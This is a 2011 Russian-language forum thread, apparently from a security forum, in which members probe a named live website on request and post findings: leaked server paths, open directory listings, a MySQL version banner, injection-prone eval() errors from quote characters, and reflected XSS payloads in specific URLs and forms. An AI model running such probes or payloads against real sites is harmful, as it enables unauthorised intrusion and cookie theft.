Проверка на уязвимости сайта

Discussion in 'Проверка на уязвимости' started by zx_su, 22 Jan 2011.

  1. zx_su

    zx_su New Member

    Joined:
    20 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Добрый день.
    Прошу проверить сайт ponimaem.com на наличие дырок.
    Буду очень благодарен.
    Прошу прошения, если тему создал не там.
     
  2. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Добавляем спец.символы в куки,видим:
    Code:
    Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
    
    Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
    
    Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Также есть возможность погулять по папкам

    Code:
    http://ponimaem.com/includes/
    
    http://ponimaem.com/images/
    
    
    При попытке постучаться на 3306 порт выплюнуло версию мускула

    5.0.91-community
     
    _________________________
    #3 BigBear, 24 Jan 2011
    Last edited: 24 Jan 2011
    seorobot likes this.
  4. CheatCodeX

    CheatCodeX New Member

    Joined:
    12 Jan 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подставляем ' в поле пароля видим
    Code:
    Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1
     
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    В гостевую требуется капча :)
     
    seorobot likes this.
  6. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    Code:
    http://ponimaem.com/gb/index.php?pg=&t="><script>alert(document.cookie)</script>
    какой балбес Acunetix запускал ? )) Вы хоть руками тоже смотрите.
     
    1 person likes this.
  7. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1

    Нажимаем регистрация в поле вставляем '
     
  8. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    XSS
    http://ponimaem.com/test.php

    Форма:
    Code:
    <script>alert('xss')</script>